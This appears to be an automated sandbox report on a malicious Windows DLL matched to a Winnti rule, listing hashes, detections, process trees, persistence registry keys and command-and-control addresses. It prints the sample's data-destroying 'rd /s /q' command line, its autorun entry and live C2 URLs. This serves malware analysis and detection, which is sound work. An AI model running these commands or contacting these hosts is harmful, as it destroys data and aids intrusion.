
Windows Analysis Report
NaRZIOq3O8.dll

Overview

General Information

Sample name: NaRZIOq3O8.dll (renamed because the original name is a hash value)
Original sample name: e999daea87b481d11b4fd8559bdd3d68516dc0ef.dll
Analysis ID: 1558496
MD5: 8ae5deac29c6d351c2376da97b75b88a
SHA1: e999daea87b481d11b4fd8559bdd3d68516dc0ef
SHA256: 6831f236816f9799458cff0c50116bcc3029f57e8cd8ab181204bc914789c1df
Tags: dll, user-NDA0E

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Contains functionality to infect the boot sector
Creates an autostart registry key pointing to binary in C:\Windows
Found evasive API chain (may stop execution after checking mutex)
Machine Learning detection for sample
Queries disk data (e.g. SMART data)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Abnormal high CPU Usage
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (may stop execution after accessing registry keys)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • loaddll32.exe (PID: 8188 cmdline: loaddll32.exe "C:\Users\user\Desktop\NaRZIOq3O8.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 4832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7280 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\NaRZIOq3O8.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 7364 cmdline: rundll32.exe "C:\Users\user\Desktop\NaRZIOq3O8.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
        • cmd.exe (PID: 7508 cmdline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • PING.EXE (PID: 7636 cmdline: ping 127.0.0.1 -n 3 MD5: B3624DD758CCECF93A1226CEF252CA12)
    • rundll32.exe (PID: 7312 cmdline: rundll32.exe C:\Users\user\Desktop\NaRZIOq3O8.dll,Group MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 6128 cmdline: rundll32.exe "C:\Users\user\Desktop\NaRZIOq3O8.dll",Group MD5: 889B99C52A60DD49227C5E485A016679)
      • cmd.exe (PID: 4556 cmdline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • PING.EXE (PID: 892 cmdline: ping 127.0.0.1 -n 3 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • rundll32.exe (PID: 7636 cmdline: "C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\NaRZIOq3O8.dll",Group MD5: 889B99C52A60DD49227C5E485A016679)
    • cmd.exe (PID: 7508 cmdline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 6364 cmdline: ping 127.0.0.1 -n 3 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • rundll32.exe (PID: 6196 cmdline: "C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\NaRZIOq3O8.dll",Group MD5: 889B99C52A60DD49227C5E485A016679)
    • cmd.exe (PID: 6836 cmdline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 7528 cmdline: ping 127.0.0.1 -n 3 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
3.2.rundll32.exe.10000000.0.unpack | Winnti_NlaifSvc | Winnti sample - file NlaifSvc.dll | Florian Roth
  • 0x2cdf2:$x1: cracked by ximo
  • 0x2cead:$x1: cracked by ximo
  • 0x2cf68:$x1: cracked by ximo
  • 0x2d023:$x1: cracked by ximo
  • 0x2d0de:$x1: cracked by ximo
  • 0x2d199:$x1: cracked by ximo
  • 0x2d254:$x1: cracked by ximo
  • 0x2d30f:$x1: cracked by ximo
  • 0x2d3ca:$x1: cracked by ximo
  • 0x2d485:$x1: cracked by ximo

System Summary

Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\NaRZIOq3O8.dll",Group, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 7312, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Vicity
No Suricata rule has matched

AV Detection

Source: NaRZIOq3O8.dll | Avira: detected
Source: NaRZIOq3O8.dll | ReversingLabs: Detection: 89%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 97.0% probability
Source: NaRZIOq3O8.dll | Joe Sandbox ML: detected
Source: NaRZIOq3O8.dll | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
Source: Binary string: c:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.*Z source: rundll32.exe, 00000003.00000003.2533457815.0000000002B34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2533805373.0000000002B34000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.**.* source: rundll32.exe, 00000003.00000003.3709951057.0000000002B4B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3709925498.0000000002B33000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\c:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.*\*.*g source: rundll32.exe, 00000003.00000003.1849601371.0000000002B29000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1849653083.0000000002B33000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.**tate\*.*.*H{ source: rundll32.exe, 00000003.00000003.2132721514.0000000002B25000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2134419805.0000000002B31000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\c:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.*.*m source: rundll32.exe, 00000003.00000003.2413353729.0000000002B37000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2413606315.0000000002B3F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.** source: rundll32.exe, 00000003.00000003.2533457815.0000000002B34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2533805373.0000000002B34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2293300146.0000000002B34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2332381587.0000000002B34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2413695167.0000000002B34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2332599254.0000000002B34000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\c:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\*.**: source: rundll32.exe, 00000003.00000003.2533864222.0000000002B41000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2533457815.0000000002B34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2533805373.0000000002B34000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_1000B3C0 lstrcpy,lstrcat,lstrcat,lstrcat,FindFirstFileA,FindNextFileA,lstrcpy,lstrcat,lstrcat,_strcmpi,PathIsDirectoryA,6D262DD0,strchr,strchr,strchr,strchr,atoi,CreateDirectoryA,Sleep,lstrcat,FindNextFileA,FindClose,3_2_1000B3C0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10005A50 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,3_2_10005A50
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\

Networking

Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 202.108.0.52 80
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 107.163.241.186 12354
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 107.163.241.185 16300
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 107.163.241.193 6520
Source: global traffic | TCP traffic: 107.163.241.186 ports 1,2,3,4,5,12354
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: global traffic | TCP traffic: 192.168.2.10:49707 -> 107.163.241.185:16300
Source: global traffic | TCP traffic: 192.168.2.10:49714 -> 107.163.241.193:6520
Source: global traffic | TCP traffic: 192.168.2.10:49715 -> 107.163.241.186:12354
Source: Joe Sandbox View | IP Address: 202.108.0.52 202.108.0.52
Source: Joe Sandbox View | ASN Name: TAKE2US TAKE2US
Source: global traffic | TCP traffic: 192.168.2.10:49717 -> 202.108.0.52:80
Source: unknown | TCP traffic detected without corresponding DNS query: 107.163.241.185
Source: unknown | TCP traffic detected without corresponding DNS query: 107.163.241.193
Source: unknown | TCP traffic detected without corresponding DNS query: 107.163.241.186
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10005E10 WSAStartup,socket,socket,socket,htons,htons,inet_addr,inet_addr,htons,inet_addr,bind,ioctlsocket,select,WSAGetLastError,Sleep,recvfrom,wsprintfA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,malloc,htons,htons,htons,htons,htons,htons,htonl,htons,inet_addr,sendto,closesocket,closesocket,closesocket,WSACleanup,3_2_10005E10
Source: global traffic | DNS traffic detected: DNS query: blog.sina.com.cn
Source: rundll32.exe, rundll32.exe, 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://107.163.241.185:16300/
Source: rundll32.exe, 00000003.00000002.3755445264.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://107.163.241.185:16300//joy.asp?sid=rungnejcndvgnJLfFe5vteX8v2LUicbtudb8mteXmJe1nde
Source: rundll32.exe, 00000003.00000002.3755445264.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://107.163.241.186:12354/login.php
Source: rundll32.exe, 00000003.00000002.3755445264.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://107.163.241.186:12354/login.php#)o
Source: rundll32.exe, 00000003.00000002.3755445264.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://107.163.241.186:12354/login.php()b
Source: rundll32.exe, 00000003.00000002.3769043111.000000000562D000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.3768985716.00000000055AD000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://107.163.241.186:12354/login.php)
Source: rundll32.exe, 00000003.00000002.3769274572.000000000584A000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.3755445264.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://107.163.241.186:12354/login.php;
Source: rundll32.exe, 00000003.00000002.3755445264.0000000002B04000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3057253768.0000000002B04000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://107.163.241.186:12354/login.phpAkn
Source: rundll32.exe, 00000003.00000002.3755445264.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://107.163.241.186:12354/login.phpB)H
Source: rundll32.exe, 00000003.00000002.3755445264.0000000002A6F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://107.163.241.186:12354/login.phpData
Source: rundll32.exe, 00000003.00000003.3057253768.0000000002B04000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://107.163.241.186:12354/login.phpMkb
Source: rundll32.exe, 00000003.00000002.3755445264.0000000002B04000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://107.163.241.186:12354/login.phpSk
Source: rundll32.exe, 00000003.00000002.3755445264.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://107.163.241.186:12354/login.phpU)U
Source: rundll32.exe, 00000003.00000003.3057253768.0000000002B04000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://107.163.241.186:12354/login.php_kt
Source: rundll32.exe, 00000003.00000002.3755445264.0000000002B04000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://107.163.241.186:12354/login.phpbV
Source: rundll32.exe, 00000003.00000002.3755445264.0000000002B04000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3057253768.0000000002B04000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://107.163.241.186:12354/login.phpckP
Source: rundll32.exe, 00000003.00000002.3755445264.0000000002A6F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://107.163.241.186:12354/login.phpogs
Source: rundll32.exe, 00000003.00000002.3755445264.0000000002B04000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://107.163.241.186:12354/login.phpwk
Source: rundll32.exe, 00000003.00000002.3755445264.0000000002B04000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://107.163.241.186:12354/login.phpykV
Source: rundll32.exe, 00000003.00000002.3768985716.00000000055AD000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://107.163.24I
Source: rundll32.exe, rundll32.exe, 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://blog.sina.com.cn/u/%s
Source: rundll32.exe, 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://blog.sina.com.cn/u/%sXGRyaXZlcnNcZXRjXGhvc3RzLmljcw==XGRyaXZlcnNcZXRjXGhvc3Rz
Source: rundll32.exe, 00000003.00000002.3755445264.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://blog.sina.com.cn/u/5655029807
Source: rundll32.exe, 00000003.00000002.3769344739.000000000597D000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.3755445264.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://blog.sina.com.cn/u/5655029807.
Source: rundll32.exe, 00000003.00000003.3057253768.0000000002B04000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://blog.sina.com.cn/u/5655029807OW64
Source: rundll32.exe, 00000003.00000002.3755445264.0000000002B04000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://blog.sina.com.cn/u/5655029807osoft
Source: rundll32.exe, 00000003.00000002.3755445264.0000000002B04000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3057253768.0000000002B04000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://blog.sina.com.cn/u/5655029807p
Source: rundll32.exe, 00000003.00000003.3057253768.0000000002B04000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://blog.sina.com.cn/u/5655029807pSk
Source: rundll32.exe, 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp, NaRZIOq3O8.dll | String found in binary or memory: http://www.rsac.org/ratingsv01.html

System Summary

Source: 3.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE | Matched rule: Winnti sample - file NlaifSvc.dll Author: Florian Roth
Source: C:\Windows\SysWOW64\rundll32.exe | Process Stats: CPU usage > 49%
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_1000C0C0: wsprintfA,DeviceIoControl,3_2_1000C0C0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10005160 ExitWindowsEx,3_2_10005160
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10006240
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_1000EAE0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_1000DAF0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_100103B0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_1000F460
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_1000EED0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 10001000 appears 283 times
Source: NaRZIOq3O8.dll | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
Source: 3.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE | Matched rule: Winnti_NlaifSvc date = 2017-01-25, hash1 = 964f9bfd52b5a93179b90d21705cd0c31461f54d51c56d558806fe0efff264e5, author = Florian Roth, description = Winnti sample - file NlaifSvc.dll, reference = https://goo.gl/VbvJtL, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: classification engine | Classification label: mal100.troj.spyw.evad.winDLL@31/1@5/5
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_1000C190 sprintf,CreateFileA,DeviceIoControl,GetLastError,FormatMessageA,CloseHandle,wsprintfA,3_2_1000C190
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10005620 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,3_2_10005620
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_100068C0 6D262DD0,6D262DD0,6D262DD0,strrchr,strncpy,strncpy,strncpy,GetSystemInfo,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,sscanf,3_2_100068C0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_100052E0 AdjustTokenPrivileges,3_2_100052E0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: wsprintfA,rand,OpenSCManagerA,CreateServiceA,GetLastError,OpenServiceA,StartServiceA,wsprintfA,wsprintfA,RegOpenKeyA,lstrlen,RegSetValueExA,wsprintfA,RegCreateKeyA,_CxxThrowException,RegSetValueExA,SetLastError,_CxxThrowException,RegCloseKey,RegOpenKeyExA,_CxxThrowException,RegSetValueExA,SetLastError,_CxxThrowException,GetLastError,RegCloseKey,RegCloseKey,3_2_10008880
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_100051F0 CreateToolhelp32Snapshot,3_2_100051F0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10006240 wsprintfA,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,6D262DD0,SysAllocString,CoSetProxyBlanket,wcscat,6D262DD0,SysAllocString,6D262DD0,VariantInit,VariantInit,VariantInit,VariantInit,6D262DD0,SysAllocString,InterlockedDecrement,_strcmpi,6D262DD0,SysAllocString,InterlockedDecrement,StrStrIA,VariantClear,VariantClear,VariantClear,CoUninitialize,3_2_10006240
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10008880 wsprintfA,rand,OpenSCManagerA,CreateServiceA,GetLastError,OpenServiceA,StartServiceA,wsprintfA,wsprintfA,RegOpenKeyA,lstrlen,RegSetValueExA,wsprintfA,RegCreateKeyA,_CxxThrowException,RegSetValueExA,SetLastError,_CxxThrowException,RegCloseKey,RegOpenKeyExA,_CxxThrowException,RegSetValueExA,SetLastError,_CxxThrowException,GetLastError,RegCloseKey,RegCloseKey,3_2_10008880
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\Desktop\11121541Jump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7580:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4832:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2088:120:WilError_03
Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\0x5d65r455f
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5908:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4556:120:WilError_03
Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\107.163.241.193:6520
Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\M107.163.241.193:6520
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\NaRZIOq3O8.dll,Group
Source: NaRZIOq3O8.dllReversingLabs: Detection: 89%
Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\NaRZIOq3O8.dll"
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\NaRZIOq3O8.dll",#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\NaRZIOq3O8.dll,Group
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\NaRZIOq3O8.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\NaRZIOq3O8.dll",Group
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\NaRZIOq3O8.dll",Group
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\NaRZIOq3O8.dll",#1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\NaRZIOq3O8.dll,Group
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\NaRZIOq3O8.dll",Group
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\NaRZIOq3O8.dll",#1
Source: C:\Windows\System32\loaddll32.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: mfc42.dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: msvcp60.dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: netapi32.dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: avicap32.dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: msvfw32.dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: winmm.dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: wtsapi32.dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: samcli.dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: Binary string: c:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.*Z source: rundll32.exe, 00000003.00000003.2533457815.0000000002B34000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2533805373.0000000002B34000.00000004.00000020.00020000.00000000.sdmp
